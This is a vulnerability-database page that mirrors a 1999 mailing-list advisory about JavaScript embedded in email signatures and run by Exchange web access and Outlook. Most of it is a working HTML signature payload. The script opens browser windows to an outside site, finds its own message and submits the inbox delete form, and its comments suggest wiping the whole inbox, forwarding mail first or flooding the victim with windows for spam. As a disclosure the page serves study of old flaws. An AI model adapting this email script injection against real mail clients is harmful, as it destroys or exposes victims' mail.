Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ms.exchange.outlook.javascript.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

JavaScript can be embedded in emails to manipulate Exchange server inbox contents or spamming.

Code
`Date: Fri, 5 Mar 1999 11:30:56 -0000   
From: Mat Newman <[email protected]>  
To: "'[email protected]'" <[email protected]>  
Subject: Exchange server web access  
  
  
You may have heard about this but...  
  
If someone is accessing Exchange server via the web then you can embed  
javascript into the email to get it to delete the contents of the users  
inbox. If they're not using the web but just ordinary Outlook then you can  
still do things like open up 10,000 browser windows etc. - useful for  
spammers!)  
  
The simplest way to do this if you're using exchange is to put the js into  
your signature (it's not in the one below!) as follows: (in  
winnt\profiles\user\Application Data\Microsoft\Shared\Signatures)  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">  
<html>  
  
<head>  
<meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type">  
<meta content="Microsoft FrontPage 3.0" name="GENERATOR">  
<title></title>  
</head>  
  
<body>  
  
<p><font face="Arial" size="2">!!!CAUTION VIRUS VERSION!!!</font></p>  
  
<p><font face="Arial" size="2">Mat Newman</font> <br>  
<script>  
<!--  
  
// Here we check to see if we're using IE4 web access  
  
if (window.opener == null){  
alert("You are using Outlook!");  
myWin =  
window.open("http://www.doodie.com/index.cfm?daily=140","","width=800,height  
=500,status=yes,toolbar=yes,menubar=yes");  
// Wouldn't it be annoying if I opened up 10,000 browsers?  
}else{  
  
// Check to see which message we are...  
  
var msg_us_index = 0;  
var msg_us_id = window.top.name;  
for (var i = 0; i<window.opener.msg_fr.deleteform.length; i++){  
if (window.opener.msg_fr.deleteform.elements[i].value == msg_us_id){  
msg_us_index = i;  
i = 100000;  
}  
}  
  
// Here we delete ourselves  
alert("Now you see me, now you don't!");  
// Check the delete box for the latest message  
window.opener.msg_fr.deleteform.elements[msg_us_index].checked = true;  
// Now do the deletion  
window.opener.msg_fr.deleteform.submit();  
// Now shut us down  
window.close();  
  
// We could simply have checked all the delete boxes to clear the inbox.  
Perhaps we could forward them on first...  
  
} // Check on Web Access  
//-->  
</script><font face="Arial" size="1">Alpha-Numeric Developments  
Limited</font> <br>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
javascript email securityexchange server vulnerabilityinbox manipulation techniqueweb access issuesspamming methods.
21